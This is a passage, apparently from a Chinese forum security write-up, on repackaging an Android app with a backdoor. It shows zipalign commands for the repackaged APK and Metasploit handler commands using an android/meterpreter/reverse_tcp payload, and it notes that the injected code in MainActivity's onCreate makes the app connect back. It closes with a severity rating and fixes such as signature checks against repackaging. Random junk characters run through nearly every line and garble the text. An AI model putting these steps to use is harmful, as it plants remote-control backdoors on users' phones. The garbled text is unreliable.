6 s* u) X, v+ _: P4 V5 Q, U# ?6 R+ G# u7 ~3 Y; D& ` \3 R" ? 字节对齐优化 ! ?2 Y0 j G$ k/ s X # B8 X5 Q: B/ f# l( p7 R

4 v+ b! }6 Q7 B) r0 ]8 i) d; q0 @1 R* e2 c zipalign -v 4 repackaged.apk final.apk ' d4 m5 k# U) {7 K+ j 2 {* I! m( ` d: ]& Y4 g

, l# a- y! @: u % x& X9 K n/ G7 \8 Y* l 检查是否对齐 ) h$ P4 ^% n$ B& t " Z* s. G ]$ `, J B1 _" Y0 H0 m+ u

q- B+ p1 T$ y) k' }8 S 0 r& y, f( g# I0 f0 m$ a8 V zipalign -c -v 4 final.apk 7 o. S0 s( E. {9 b; }* Y! L # A9 t+ x4 U& X* X! t$ w

% J5 e9 e: n% Y, y3 o) ^9 F5 G" l8 K9 v! k! x 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 ( y% \' O& D% Q% l. C 8 F" b8 f+ M: y1 b

. `% M( Y! x) @* v2 [5 e- X/ T8 P& u8 r. J. I. } 启动Metasploit控制台，配置参数等待上线 ( [" S( k$ U& W2 W" |: p# d 7 R4 W8 v ?6 u/ G5 w/ c, Y4 x

( j) d0 i. Y3 y3 l6 S, S' w - u6 F, W- m* L0 \ b3 E3 j3 q 在终端依次输入如下命令 ! H2 Y6 D9 d" R : _2 h' U! F4 Q6 T4 I2 E

5 u# Q5 i% i; X$ {& e1 v 0 \! r7 S2 L7 E8 c msfconsole - x; E9 f5 v( B1 E* }1 ?3 d- Z ]- x }) l

0 A+ c! [5 G# H9 G : y1 E6 D( J3 j" q0 c+ m& |- x' v use exploit/multi/handler 0 {. i; i! S" ? * Z+ o7 T& l# m ~1 \

& j+ K2 }$ b n& G: W . E" Z" |. R! J' A6 e8 V set PAYLOAD android/meterpreter/reverse_tcp ( E! ]# x3 h2 [; i- B% c8 L7 | F# b7 V/ i

8 r/ D7 c2 W) X0 J9 \( R$ G3 q7 ^1 n# `5 x3 |& C) ^ set LHOST 192.xxx.xx.xx + B4 G, o6 ~. J 1 x+ |$ |% x/ Q, p5 s

9 L1 Q, a- X) t6 D0 s4 c; G 7 k9 l+ k3 \9 a5 Y1 n! O; i6 s set LPORT 4444 & S0 I( C ], O9 o8 M7 b # h: u( D0 ~6 M" H. `" z, J

4 T( d7 g# z5 a7 L% n7 `: e 5 l& N( F$ F2 f# O/ y% n0 n exploit + p8 p' }/ W, Y4 F0 A( Y; i ) b {2 K& M/ `; N; v, U2 i

( M( b1 E- J+ j9 l. a I" N" H$ `3 A" g( w5 w. b" \/ s8 Q/ a 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： * R7 o& K8 M2 K, [# ?" m& G: \& O5 ^; O, X% S) x- Q

" W# P' a9 \) C0 B / ]3 v: ]2 s. N, V% L 漏洞危害：中 ( e# `! g+ G) Y u& P- R" I ; }( g9 q7 a1 u+ D

- X' t; Q0 v: A 9 v4 ? Y2 S& Q2 V D2 M( f; f9 H 8 Y8 N$ ]( O* m: H/ f( I! k9 B, n1 B1 e( @ 严重程度 7 r+ `1 _8 o' ~- S) b$ J3 B5 I" V+ ?9 A& E U3 B" u$ U4 K # r3 U) E* \|( G8 \& @2 }9 P. B5 E! Z# ?; c- P% m* l: f$ H	* l/ K' u) E8 a/ z, `# A: J. J 2 j5 c9 b7 j8 U2 N# d# l* @ + i, X( K* x/ V2 {% g3 l; t4 J [ @* {' M; ]$ y" f 高 ! U4 A6 \7 s- ~5 B1 a# z: d' P$ J% [/ Q: V& V9 S ! N! D/ c" w% e* z3 I9 ^ % z4 f5 T$ x9 Z6 \3 S& b	; ?5 z% v! s& j9 K' q3 w* ] ( w+ {1 e+ g: w ) \|' }- l7 c$ T T* ?5 l 4 D) e5 k9 n( K9 x/ t$ \| ■ - u4 \|1 x5 ~" b4 V # \. \1 O; _- O% H7 v7 ?$ ? $ v. ~( l: w- {+ _' ]" \* J ! B$ U) N5 g X' U	6 M" R5 [- T7 q( u 1 x* d$ q4 } U! Y& u! c9 n2 j% [ 5 \ c/ l( {' M, k3 A ) ], D. _+ D8 I5 C$ k4 _ 中 " w' W* u9 v- ?5 [9 C2 m R' V9 r! ~; T; q 9 D' e0 X$ a! D, V1 s* w$ t! { $ a) _6 c6 D$ t8 ~: l# l	# A0 \|$ g+ g1 H# \| + J# E& Z5 k8 c5 f+ g, T: Q5 s( Z& s1 n & d5 a; x2 v: L J" v3 \! [ 1 i' G( `1 J* G' f 9 p1 x2 N! o" P8 p8 s8 R ( [& m& Z A# l+ i9 e 2 s) Q0 Q/ K0 a3 K w' O4 T 5 \* f/ y8 z ]8 ~; V# k; v! B; Q 9 S) i6 T: o2 ^6 z ) w2 l( }0 y0 V8 G! ~. P	) h& j; t: M- M4 u* l) i - n+ t- q2 \0 ? % ?! x7 K R7 T9 z, B" a9 F - Z2 x0 L: ^, Z) T 低 # L; U2 n$ n( y+ M: U, O! O: P8 H ' i7 k) a/ u: T7 \! ]! N ; p! t$ E# a5 o( h( s1 T 9 n' Z S9 A$ @	6 Y% L1 U& h! c' {4 C6 a. v/ J0 k- N' [ A 8 h* @; k7 m& U: Q6 { R( {# {6 Q0 O% ~" J; \, @ 6 ^1 x" C6 @5 W& Y9 }+ i; v+ b5 f6 k6 d1 j2 P0 T+ X ! U- [- W" N, v# H/ X 9 L, h- f* B9 }! }" S% \ & W& D* ?8 I: M- H( O! {% N+ ~) b + w+ a0 t7 N* \|" B% Z6 e

4 L9 ~" Z+ s; |; O: R# X y5 a 8 R- k9 j' p4 S$ _' H! Y( b % {, V) I: d K) M1 y ' z& s' W( s0 k/ G

; n Z! ?* S. U+ I% P 5 Z- G# R% J/ ]6 v7 y( q 修复方法： 2 c9 D7 M; y) B* f: i 2 N/ I) l0 n) G' r. d

( H2 P: s; r9 h& H3 Q( D % k/ d* v' s" l4 w; O# P1 H 1.在 APP 启动时应做签名校验防止二次打包。
2 D% o2 `. x8 o+ m$ |' U0 q3 a% v- p1 y6 L 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 % r( r |( f$ Y+ V6 \4 x! }6 r3 I) F! i7 K% J5 n6 e- }: e

7 v5 @& h" A1 k* T, r 6 B7 O7 d6 o! d- F8 `- T8 l' y: e 2 D g% T# O' J. a7 s2 |: i, g# e9 j5 F

) U) B& o* S% e* M. @+ V- {; h% |7 S& A! i
: t, |! w# a. v' W& d- J) F7 y9 G( X7 u/ {% ~, `

		自动登录	找回密码
密码			立即注册